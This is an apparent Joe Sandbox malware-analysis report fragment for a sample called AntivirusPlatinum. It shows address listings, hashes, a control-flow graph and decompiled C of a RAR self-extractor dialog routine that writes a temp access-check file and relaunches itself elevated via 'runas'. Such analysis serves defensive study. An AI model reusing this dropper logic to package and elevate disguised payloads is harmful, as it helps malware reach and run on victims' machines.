                                                                                                                                                  0x0041102a
                                                                                                                                                  0x0041102b
                                                                                                                                                  0x0041102d
                                                                                                                                                  0x004110c8
                                                                                                                                                  0x004110c8
                                                                                                                                                  0x004110ce
                                                                                                                                                  0x004110d0
                                                                                                                                                  0x004110d3
                                                                                                                                                  0x004110d9
                                                                                                                                                  0x004110db
                                                                                                                                                  0x004110db
                                                                                                                                                  0x004110db
                                                                                                                                                  0x004110db
                                                                                                                                                  0x004110d9
                                                                                                                                                  0x004110e1
                                                                                                                                                  0x004110e6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00411033
                                                                                                                                                  0x00411033
                                                                                                                                                  0x00411036
                                                                                                                                                  0x004110a8
                                                                                                                                                  0x004110af
                                                                                                                                                  0x004110b4
                                                                                                                                                  0x004110b9
                                                                                                                                                  0x004110c0
                                                                                                                                                  0x004110c2
                                                                                                                                                  0x004110c2
                                                                                                                                                  0x004110c5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004110c5
                                                                                                                                                  0x00411038
                                                                                                                                                  0x0041103b
                                                                                                                                                  0x0041103f
                                                                                                                                                  0x00411046
                                                                                                                                                  0x0041104e
                                                                                                                                                  0x00411053
                                                                                                                                                  0x0041105c
                                                                                                                                                  0x0041105e
                                                                                                                                                  0x0041105e
                                                                                                                                                  0x00411061
                                                                                                                                                  0x00411061
                                                                                                                                                  0x00411064
                                                                                                                                                  0x0041106a
                                                                                                                                                  0x0041106c
                                                                                                                                                  0x00411080
                                                                                                                                                  0x00411085
                                                                                                                                                  0x00411088
                                                                                                                                                  0x0041109c
                                                                                                                                                  0x0041109e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041109e
                                                                                                                                                  0x0041108a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041106e
                                                                                                                                                  0x0041106f
                                                                                                                                                  0x00411094
                                                                                                                                                  0x00411094
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00411094
                                                                                                                                                  0x0041106c
                                                                                                                                                  0x0041102d
                                                                                                                                                  0x00410fae
                                                                                                                                                  0x00410fb4
                                                                                                                                                  0x00410fb7
                                                                                                                                                  0x00410fb7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410fb7
                                                                                                                                                  0x00410ea7
                                                                                                                                                  0x00410eb1
                                                                                                                                                  0x00410eb6
                                                                                                                                                  0x0041122a
                                                                                                                                                  0x0041122f
                                                                                                                                                  0x0041122f
                                                                                                                                                  0x0041122f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041122f
                                                                                                                                                  0x00410ec2
                                                                                                                                                  0x00410f80
                                                                                                                                                  0x00410f8c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410f8c
                                                                                                                                                  0x00410eca
                                                                                                                                                  0x00410ed1
                                                                                                                                                  0x00410ee7
                                                                                                                                                  0x00410eea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410ef0
                                                                                                                                                  0x00410ef3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410ef9
                                                                                                                                                  0x00410efc
                                                                                                                                                  0x00410f07
                                                                                                                                                  0x00410f0a
                                                                                                                                                  0x00410f61
                                                                                                                                                  0x00410f64
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410f68
                                                                                                                                                  0x00410f6d
                                                                                                                                                  0x00410f70
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410f76
                                                                                                                                                  0x00410f78
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410f78
                                                                                                                                                  0x00410f0c
                                                                                                                                                  0x00410f0e
                                                                                                                                                  0x00410f11
                                                                                                                                                  0x00410f11
                                                                                                                                                  0x00410f13
                                                                                                                                                  0x00410f13
                                                                                                                                                  0x00410f17
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410f20
                                                                                                                                                  0x00410f25
                                                                                                                                                  0x00410f28
                                                                                                                                                  0x00410f30
                                                                                                                                                  0x00410f33
                                                                                                                                                  0x00410f36
                                                                                                                                                  0x00410f40
                                                                                                                                                  0x00410f40
                                                                                                                                                  0x00410f38
                                                                                                                                                  0x00410f38
                                                                                                                                                  0x00410f38
                                                                                                                                                  0x00410f2a
                                                                                                                                                  0x00410f2a
                                                                                                                                                  0x00410f2a
                                                                                                                                                  0x00410f42
                                                                                                                                                  0x00410f43
                                                                                                                                                  0x00410f46
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410f48
                                                                                                                                                  0x00410f48
                                                                                                                                                  0x00410f4c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410f58
                                                                                                                                                  0x00410f59
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410f59
                                                                                                                                                  0x00410f46
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410f13
                                                                                                                                                  0x00410f00
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410f00
                                                                                                                                                  0x00410ed5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410e60
                                                                                                                                                  0x00410e62
                                                                                                                                                  0x00410e67
                                                                                                                                                  0x00410e6d
                                                                                                                                                  0x00410e73
                                                                                                                                                  0x00411241
                                                                                                                                                  0x00411241
                                                                                                                                                  0x00411241
                                                                                                                                                  0x00410e79
                                                                                                                                                  0x00410e8d
                                                                                                                                                  0x00410e94
                                                                                                                                                  0x0041121e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041121e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410e94
                                                                                                                                                  0x00410e7b
                                                                                                                                                  0x00410e87
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410e87
                                                                                                                                                  0x00410e5a
                                                                                                                                                  0x00411236
                                                                                                                                                  0x00411238
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00411238
                                                                                                                                                  0x00410dec
                                                                                                                                                  0x00410df3
                                                                                                                                                  0x00410dfa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410e04
                                                                                                                                                  0x00410e11
                                                                                                                                                  0x00410e18
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410e18
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410d89
                                                                                                                                                  0x00410d89
                                                                                                                                                  0x00410d8c
                                                                                                                                                  0x00410d8e
                                                                                                                                                  0x00410d8e
                                                                                                                                                  0x00410d97
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410d9a
                                                                                                                                                  0x00410da3
                                                                                                                                                  0x00410daa
                                                                                                                                                  0x00410dae
                                                                                                                                                  0x00410db1
                                                                                                                                                  0x00410db6
                                                                                                                                                  0x00410db9
                                                                                                                                                  0x00410db9
                                                                                                                                                  0x00410dbc
                                                                                                                                                  0x00410dc6
                                                                                                                                                  0x00410dc7
                                                                                                                                                  0x00410dc7
                                                                                                                                                  0x00410dca
                                                                                                                                                  0x00410dca
                                                                                                                                                  0x00410dcf
                                                                                                                                                  0x00410dcf
                                                                                                                                                  0x00410dd0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410d8e

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e39889d3b9d423c40e8e9e1918b35b6cc5c2e3f1712bcc4791a5cff916639a1d
                                                                                                                                                  • Instruction ID: 2f23f26b4e860162697db71149469eb4a2c789a3ce5996a89fe4a76fa1262b3b
                                                                                                                                                  • Opcode Fuzzy Hash: e39889d3b9d423c40e8e9e1918b35b6cc5c2e3f1712bcc4791a5cff916639a1d
                                                                                                                                                  • Instruction Fuzzy Hash: DCD12370A00B449BDB349B35C8916EFB7E1AB45308F14483FE59AD7391D7BCA9C68B09
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 40cc24-40cc57 call 401200 call 40309d 5 40cc5d-40cc5e 0->5 6 40d04f-40d062 0->6 7 40cc60-40cc65 5->7 8 40cc6f-40cc71 5->8 9 40d073-40d07a 6->9 10 40d064-40d06d SendMessageA 6->10 11 40cc67-40cc68 7->11 12 40ccce-40cce9 GetDlgItemTextA 7->12 13 40d335-40d339 8->13 14 40d08c-40d100 call 40ba36 GetDlgItem GetWindowRect MapWindowPoints SetMenu CreateWindowExA 9->14 15 40d07c-40d086 SendDlgItemMessageA 9->15 10->9 18 40cca7-40ccad 11->18 19 40cc6a-40cc6d 11->19 16 40cd08-40cd0e 12->16 17 40cceb-40ccf1 12->17 29 40d102-40d109 SetMenu 14->29 30 40d10b-40d13a SetWindowPos DestroyWindow SendMessageA 14->30 15->14 27 40cd10-40cd1d 16->27 28 40cd22-40cd34 GetDlgItem 16->28 24 40ccf3 17->24 25 40ccfd 17->25 22 40ccc1-40cccc 18->22 23 40ccaf-40ccbf 18->23 19->8 26 40cc76-40cc8d call 4098f7 call 4027d8 19->26 32 40ccff-40cd06 EndDialog 22->32 23->22 31 40cc9f-40cca2 23->31 24->25 25->32 26->31 62 40cc8f-40cc99 SetDlgItemTextA 26->62 34 40cfe6-40cfec 27->34 35 40cd36-40cd55 SendMessageA * 2 28->35 36 40cd57-40cd79 SetFocus call 4058ff 28->36 37 40d159-40d182 GetCurrentDirectoryA GetDlgItem 29->37 38 40d147-40d153 SendMessageA 30->38 39 40d13c-40d141 SendMessageA 30->39 31->13 32->31 42 40cff2-40cff8 34->42 43 40d2ab 34->43 35->36 53 40cd8b-40cda1 SetCurrentDirectoryA 36->53 54 40cd7b-40cd80 GetLastError 36->54 45 40d184 37->45 46 40d18a-40d1c1 SetWindowTextA call 40aafc call 40ca95 37->46 38->37 39->38 42->43 44 40cffe-40d01c call 4098f7 SetDlgItemTextA 42->44 51 40d2b1-40d2be call 40bf99 43->51 63 40d023-40d02f 44->63 64 40d01e-40d021 44->64 45->46 76 40d1d1-40d1d7 46->76 77 40d1c3-40d1cc call 40bf99 46->77 72 40d2c3-40d2ca 51->72 58 40cda3-40cda8 GetLastError 53->58 59 40cdae-40cdb5 call 406ea5 53->59 55 40cd82-40cd85 54->55 56 40cd87 54->56 55->53 55->56 56->53 58->59 65 40cdaa 58->65 74 40ce25-40ce27 59->74 75 40cdb7-40cdbd 59->75 62->31 69 40d032-40d04a call 4098f7 * 2 MessageBoxA 63->69 64->69 65->59 103 40d333 69->103 78 40d2d6-40d2dc 72->78 79 40d2cc-40d2d0 KiUserCallbackDispatcher 72->79 81 40ce28-40ce2b 74->81 75->74 82 40cdbf-40cdc2 75->82 84 40d234-40d23a 76->84 85 40d1d9-40d1df 76->85 77->76 86 40d2f0-40d2f7 78->86 87 40d2de-40d2eb call 40307f * 2 78->87 79->78 93 40ce31-40ce37 81->93 94 40cf4d-40cfb8 call 40b92f call 40307f * 3 call 40bf99 * 2 call 40b322 call 40bf99 81->94 95 40cdc4-40cdfd GetTickCount wsprintfA call 404ec3 call 4051d8 82->95 96 40ce3e-40ce40 82->96 97 40d2c0-40d2c2 84->97 98 40d240-40d254 call 40bf99 84->98 88 40d1e4-40d20f call 40a5e2 call 4098f7 call 40a5e2 85->88 90 40d2f9-40d2ff 86->90 91 40d31b-40d321 86->91 87->86 151 40d211-40d217 88->151 90->91 101 40d301-40d30b 90->101 91->103 104 40d323-40d32d call 4098f7 SetDlgItemTextA 91->104 106 40ce41-40ce49 93->106 107 40ce39-40ce3c 93->107 166 40cfd8-40cfe0 call 40307f 94->166 167 40cfba-40cfc0 94->167 133 40ce02-40ce07 95->133 96->106 97->72 125 40d256-40d25c 98->125 126 40d27e-40d287 98->126 112 40d315 PostMessageA 101->112 113 40d30d-40d313 SendMessageA 101->113 103->13 104->103 116 40cef0-40cf3a call 4098f7 wsprintfA call 40325c call 4098f7 MessageBoxA 106->116 117 40ce4f-40cecb GetModuleFileNameA wsprintfA ShellExecuteExA 106->117 107->106 112->91 113->91 132 40cf40-40cf48 KiUserCallbackDispatcher 116->132 117->116 123 40cecd-40ceee WaitForInputIdle Sleep 117->123 123->132 125->126 134 40d25e-40d279 call 406d54 call 40a205 125->134 126->51 130 40d289-40d2a3 DialogBoxParamA 126->130 130->51 138 40d2a5 130->138 132->103 140 40ce18-40ce23 call 405074 133->140 141 40ce09-40ce12 133->141 134->126 138->43 140->81 141->140 153 40ce14 141->153 151->84 155 40d219-40d22f call 406d54 151->155 153->140 155->84 166->34 167->166 168 40cfc2-40cfc8 167->168 168->166 170 40cfca-40cfd3 call 40bf99 168->170 170->166
                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E0040CC24(void* __ecx, void* __edx, struct HWND__* _a4, struct HWND__* _a8, signed int _a11, struct HWND__* _a12, signed int _a15, intOrPtr _a16) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				struct tagPOINT _v20;
                                                                                                                                                  				struct _SHELLEXECUTEINFOA _v80;
                                                                                                                                                  				char _v1104;
                                                                                                                                                  				char _v2128;
                                                                                                                                                  				char _v2640;
                                                                                                                                                  				char _v5340;
                                                                                                                                                  				char _v5744;
                                                                                                                                                  				char _v13936;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t90;
                                                                                                                                                  				long _t91;
                                                                                                                                                  				long _t92;
                                                                                                                                                  				signed int _t106;
                                                                                                                                                  				int _t109;
                                                                                                                                                  				CHAR* _t114;
                                                                                                                                                  				signed int _t118;
                                                                                                                                                  				signed int _t128;
                                                                                                                                                  				signed int _t130;
                                                                                                                                                  				void* _t149;
                                                                                                                                                  				struct HWND__* _t152;
                                                                                                                                                  				signed int _t155;
                                                                                                                                                  				signed int _t157;
                                                                                                                                                  				signed int _t158;
                                                                                                                                                  				intOrPtr _t171;
                                                                                                                                                  				CHAR* _t172;
                                                                                                                                                  				int _t193;
                                                                                                                                                  				signed int _t201;
                                                                                                                                                  				long _t202;
                                                                                                                                                  				long _t203;
                                                                                                                                                  				long _t204;
                                                                                                                                                  				void* _t210;
                                                                                                                                                  				signed int _t214;
                                                                                                                                                  				void* _t223;
                                                                                                                                                  				intOrPtr _t224;
                                                                                                                                                  				intOrPtr _t225;
                                                                                                                                                  				struct HWND__* _t231;
                                                                                                                                                  				int _t233;
                                                                                                                                                  				void* _t235;
                                                                                                                                                  				struct HWND__* _t242;
                                                                                                                                                  				void* _t243;
                                                                                                                                                  
                                                                                                                                                  				_t230 = __edx;
                                                                                                                                                  				_t223 = __ecx;
                                                                                                                                                  				E00401200(0x366c);
                                                                                                                                                  				_t242 = _a4;
                                                                                                                                                  				E0040309D(__edx, _t242, _a8, _a12, _a16, "STARTDLG", 0, 0); // executed
                                                                                                                                                  				_t90 = _a8 - 0x110;
                                                                                                                                                  				if(_t90 == 0) {
                                                                                                                                                  					_t91 =  *0x4192d4; // 0x170247
                                                                                                                                                  					 *0x419f80 = _t242;
                                                                                                                                                  					 *0x419f7c = _t242;
                                                                                                                                                  					__eflags = _t91;
                                                                                                                                                  					if(_t91 != 0) {
                                                                                                                                                  						SendMessageA(_t242, 0x80, 1, _t91);
                                                                                                                                                  					}
                                                                                                                                                  					_t92 =  *0x4192d0; // 0x5d050a36
                                                                                                                                                  					__eflags = _t92;
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						SendDlgItemMessageA(_t242, 0x69, 0x172, 0, _t92); // executed
                                                                                                                                                  					}
                                                                                                                                                  					E0040BA36(_t230, __eflags, _t242);
                                                                                                                                                  					_a8 = GetDlgItem(_t242, 0x67);
                                                                                                                                                  					GetWindowRect(_a8,  &_v20);
                                                                                                                                                  					MapWindowPoints(0, _t242,  &_v20, 2);
                                                                                                                                                  					_t231 = SetMenu;
                                                                                                                                                  					SetMenu(_a8, 0);
                                                                                                                                                  					_t106 = CreateWindowExA(0, "RichEdit", 0x41259a, 0x50a10844, _v20.x, _v20.y, _v12 - _v20 + 1, _v8 - _v20.y + 1, _t242, 0x67,  *0x414c78, 0); // executed
                                                                                                                                                  					_a12 = _t106;
                                                                                                                                                  					__eflags = _t106;
                                                                                                                                                  					if(_t106 != 0) {
                                                                                                                                                  						_t231 = _a12;
                                                                                                                                                  						SetWindowPos(_t231, _a8, 0, 0, 0, 0, 0x203);
                                                                                                                                                  						DestroyWindow(_a8); // executed
                                                                                                                                                  						_a8 = _t231;
                                                                                                                                                  						_t109 = SendMessageA(_t242, 0x31, 0, 0);
                                                                                                                                                  						__eflags = _t109;
                                                                                                                                                  						if(_t109 != 0) {
                                                                                                                                                  							SendMessageA(_t231, 0x30, _t109, 0); // executed
                                                                                                                                                  						}
                                                                                                                                                  						SendMessageA(_t231, 0x435, 0, 0x400000);
                                                                                                                                                  					} else {
                                                                                                                                                  						SetMenu(_a8, 0x67);
                                                                                                                                                  					}
                                                                                                                                                  					GetCurrentDirectoryA(0x400,  &_v2128);
                                                                                                                                                  					_a12 = GetDlgItem(_t242, 0x65);
                                                                                                                                                  					_t114 = 0x419f92;
                                                                                                                                                  					__eflags =  *0x419f92; // 0x0
                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                  						_t114 =  &_v2128;
                                                                                                                                                  					}
                                                                                                                                                  					SetWindowTextA(_a12, _t114); // executed
                                                                                                                                                  					E0040AAFC(_t223, __eflags, _a12); // executed
                                                                                                                                                  					 *0x41a814 = 0; // executed
                                                                                                                                                  					E0040CA95(0, _t230, _t231, _t242, __eflags, "C:\Users\alfons\Desktop\Endermanch@AntivirusPlatinum.exe", "C:\Users\alfons\Desktop\Endermanch@AntivirusPlatinum.exe", 0x41a818, 0x41a824); // executed
                                                                                                                                                  					__eflags =  *0x41a824;
                                                                                                                                                  					if( *0x41a824 > 0) {
                                                                                                                                                  						E0040BF99(_t230, _t242, _t242,  *0x41a818, 7); // executed
                                                                                                                                                  					}
                                                                                                                                                  					__eflags =  *0x41a814;
                                                                                                                                                  					if( *0x41a814 != 0) {
                                                                                                                                                  						L75:
                                                                                                                                                  						__eflags =  *0x41a824;
                                                                                                                                                  						if( *0x41a824 <= 0) {
                                                                                                                                                  							_t233 = 1;
                                                                                                                                                  							__eflags = 1;
                                                                                                                                                  							L85:
                                                                                                                                                  							__eflags =  *0x419f8c - 2;
                                                                                                                                                  							if( *0x419f8c == 2) {
                                                                                                                                                  								EnableWindow(_a12, 0);
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *0x419f88; // 0x0
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								E0040307F(_t242, 0x66, 0);
                                                                                                                                                  								E0040307F(_t242, 0x65, 0);
                                                                                                                                                  							}
                                                                                                                                                  							_t118 =  *0x419f8c; // 0x2
                                                                                                                                                  							__eflags = _t118;
                                                                                                                                                  							if(_t118 != 0) {
                                                                                                                                                  								__eflags =  *0x419f78; // 0x2
                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_push(_t233);
                                                                                                                                                  									_push(0x111);
                                                                                                                                                  									_push(_t242);
                                                                                                                                                  									__eflags = _t118 - _t233;
                                                                                                                                                  									if(_t118 != _t233) {
                                                                                                                                                  										PostMessageA();
                                                                                                                                                  									} else {
                                                                                                                                                  										SendMessageA();
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *0x419f68; // 0x0
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								SetDlgItemTextA(_t242, _t233, E004098F7(0x7d));
                                                                                                                                                  							}
                                                                                                                                                  							L96:
                                                                                                                                                  							return _t233;
                                                                                                                                                  						}
                                                                                                                                                  						E0040BF99(_t230, _t242, _t242,  *0x41a818, 0); // executed
                                                                                                                                                  						_t128 =  *0x41a81c;
                                                                                                                                                  						__eflags = _t128;
                                                                                                                                                  						if(_t128 != 0) {
                                                                                                                                                  							__eflags =  *0x419f8c; // 0x2
                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                  								_t224 =  *0x418ecc; // 0x0
                                                                                                                                                  								E00406D54(_t224,  *0x414c74, _a8, _t128);
                                                                                                                                                  								E0040A205( *0x41a81c);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t233 = 1;
                                                                                                                                                  						__eflags =  *0x419f8c - _t233; // 0x2
                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                  							L83:
                                                                                                                                                  							E0040BF99(_t230, _t242, _t242,  *0x41a818, _t233);
                                                                                                                                                  							goto L85;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t130 = DialogBoxParamA( *0x414c74, "LICENSEDLG", 0, E0040CB2B, 0); // executed
                                                                                                                                                  							__eflags = _t130;
                                                                                                                                                  							if(_t130 != 0) {
                                                                                                                                                  								goto L83;
                                                                                                                                                  							}
                                                                                                                                                  							 *0x419f78 = 1;
                                                                                                                                                  							L82:
                                                                                                                                                  							_push(_t233);
                                                                                                                                                  							L45:
                                                                                                                                                  							EndDialog(_t242, ??); // executed
                                                                                                                                                  							goto L96;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_v13936 = 0;
                                                                                                                                                  						_t235 = 0x96;
                                                                                                                                                  						do {
                                                                                                                                                  							E0040A5E2( &_v13936, " ");
                                                                                                                                                  							E0040A5E2( &_v13936, E004098F7(_t235));
                                                                                                                                                  							_t235 = _t235 + 1;
                                                                                                                                                  							__eflags = _t235 - 0x9b;
                                                                                                                                                  						} while (_t235 <= 0x9b);
                                                                                                                                                  						__eflags =  *0x419f8c; // 0x2
                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                  							_t225 =  *0x418ecc; // 0x0
                                                                                                                                                  							E00406D54(_t225,  *0x414c74, _a8,  &_v13936);
                                                                                                                                                  						}
                                                                                                                                                  						goto L75;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				if(_t90 != 1) {
                                                                                                                                                  					L5:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t149 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t149 == 0) {
                                                                                                                                                  					GetDlgItemTextA(_t242, 0x65,  &_v1104, 0x400);
                                                                                                                                                  					__eflags =  *0x419f70; // 0x0
                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                  						__eflags =  *0x419f68; // 0x0
                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                  							_t152 = GetDlgItem(_t242, 0x67);
                                                                                                                                                  							_a8 = _t152;
                                                                                                                                                  							__eflags =  *0x419f74; // 0x0
                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                  								SendMessageA(_t152, 0xb1, 0, 0xffffffff);
                                                                                                                                                  								SendMessageA(_a8, 0xc2, 0, 0x41259a);
                                                                                                                                                  							}
                                                                                                                                                  							SetFocus(_a8);
                                                                                                                                                  							_a11 = 0;
                                                                                                                                                  							_t155 = E004058FF(0, _t242,  &_v1104, 0, 0);
                                                                                                                                                  							__eflags = _t155;
                                                                                                                                                  							if(_t155 != 0) {
                                                                                                                                                  								L25:
                                                                                                                                                  								_t157 = SetCurrentDirectoryA( &_v1104); // executed
                                                                                                                                                  								__eflags = _t157;
                                                                                                                                                  								_a15 = _t157 != 0;
                                                                                                                                                  								__eflags = _a15;
                                                                                                                                                  								if(_a15 == 0) {
                                                                                                                                                  									_t203 = GetLastError();
                                                                                                                                                  									__eflags = _t203 - 5;
                                                                                                                                                  									if(_t203 == 5) {
                                                                                                                                                  										_a11 = 1;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								_t158 = E00406EA5();
                                                                                                                                                  								__eflags = _t158;
                                                                                                                                                  								if(_t158 == 0) {
                                                                                                                                                  									L35:
                                                                                                                                                  									_t233 = 1;
                                                                                                                                                  									__eflags = 1;
                                                                                                                                                  									L36:
                                                                                                                                                  									__eflags = _a15;
                                                                                                                                                  									if(_a15 != 0) {
                                                                                                                                                  										E0040B92F(_t242,  &_v1104); // executed
                                                                                                                                                  										 *0x419f6c = _t233;
                                                                                                                                                  										E0040307F(_t242, 0x66, 0);
                                                                                                                                                  										E0040307F(_t242, 0x65, 0);
                                                                                                                                                  										E0040307F(_t242, _t233, 0);
                                                                                                                                                  										E0040BF99(_t230, _t242, _t242,  *0x41a818, 5);
                                                                                                                                                  										E0040BF99(_t230, _t242, _t242,  *0x41a818, 2);
                                                                                                                                                  										E0040B322(_t230, __eflags, "C:\Users\alfons\Desktop\Endermanch@AntivirusPlatinum.exe", "C:\Users\alfons\Desktop\Endermanch@AntivirusPlatinum.exe"); // executed
                                                                                                                                                  										E0040BF99(_t230, _t242, _t242,  *0x41a818, 6);
                                                                                                                                                  										__eflags =  *0x419f78; // 0x2
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											__eflags =  *0x419f74; // 0x0
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												__eflags =  *0x41a828;
                                                                                                                                                  												if( *0x41a828 == 0) {
                                                                                                                                                  													E0040BF99(_t230, _t242, 0,  *0x41a818, 4); // executed
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										E0040307F(_t242, _t233, _t233);
                                                                                                                                                  										 *0x419f6c = 0;
                                                                                                                                                  										goto L51;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *0x419f91; // 0x0
                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                  										_a11 = 0;
                                                                                                                                                  									}
                                                                                                                                                  									L40:
                                                                                                                                                  									__eflags = _a11;
                                                                                                                                                  									__eflags = _t158 & 0xffffff00 | _a11 == 0x00000000;
                                                                                                                                                  									if((_t158 & 0xffffff00 | _a11 == 0x00000000) != 0) {
                                                                                                                                                  										L43:
                                                                                                                                                  										wsprintfA( &_v2640, "\"%s\"\n%s",  &_v1104, E004098F7(0x82));
                                                                                                                                                  										E0040325C(0x414c7c, _t233);
                                                                                                                                                  										MessageBoxA(_t242,  &_v2640, E004098F7(0x7e), 0x30);
                                                                                                                                                  										 *0x419f74 =  *0x419f74 + 1;
                                                                                                                                                  										__eflags =  *0x419f74;
                                                                                                                                                  										L44:
                                                                                                                                                  										_push(0);
                                                                                                                                                  										goto L45;
                                                                                                                                                  									}
                                                                                                                                                  									GetModuleFileNameA(0,  &_v2128, 0x400);
                                                                                                                                                  									wsprintfA( &_v5340, "-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"",  &_v1104, 0x41a792, 0x41a392);
                                                                                                                                                  									_v80.lpFile =  &_v2128;
                                                                                                                                                  									_v80.lpParameters =  &_v5340;
                                                                                                                                                  									_t243 = _t243 + 0x14;
                                                                                                                                                  									_v80.cbSize = 0x3c;
                                                                                                                                                  									_v80.fMask = 0x40;
                                                                                                                                                  									_v80.hwnd = _t242;
                                                                                                                                                  									_v80.lpVerb = "runas";
                                                                                                                                                  									_v80.lpDirectory = 0x412340;
                                                                                                                                                  									_v80.nShow = _t233;
                                                                                                                                                  									_v80.hInstApp = 0;
                                                                                                                                                  									_t193 = ShellExecuteExA( &_v80);
                                                                                                                                                  									__eflags = _t193;
                                                                                                                                                  									if(_t193 == 0) {
                                                                                                                                                  										goto L43;
                                                                                                                                                  									}
                                                                                                                                                  									WaitForInputIdle(_v80.hProcess, 0x2710);
                                                                                                                                                  									Sleep(0x1f4);
                                                                                                                                                  									 *0x41a828 = _v80.hProcess;
                                                                                                                                                  									goto L44;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags =  *0x419f91; // 0x0
                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                  									goto L35;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _a15;
                                                                                                                                                  								if(_a15 == 0) {
                                                                                                                                                  									_t233 = 1;
                                                                                                                                                  									__eflags = 1;
                                                                                                                                                  									goto L40;
                                                                                                                                                  								}
                                                                                                                                                  								wsprintfA( &_v2128, "__tmp_rar_sfx_access_check_%u", GetTickCount());
                                                                                                                                                  								_t243 = _t243 + 0xc;
                                                                                                                                                  								E00404EC3( &_v5744);
                                                                                                                                                  								_t233 = 1;
                                                                                                                                                  								_t201 = E004051D8( &_v5744,  &_v2128, 0, 1); // executed
                                                                                                                                                  								_a15 = _t201;
                                                                                                                                                  								__eflags = _t201;
                                                                                                                                                  								if(_t201 == 0) {
                                                                                                                                                  									_t202 = GetLastError();
                                                                                                                                                  									__eflags = _t202 - 5;
                                                                                                                                                  									if(_t202 == 5) {
                                                                                                                                                  										_a11 = 1;
                                                                                                                                                  									}
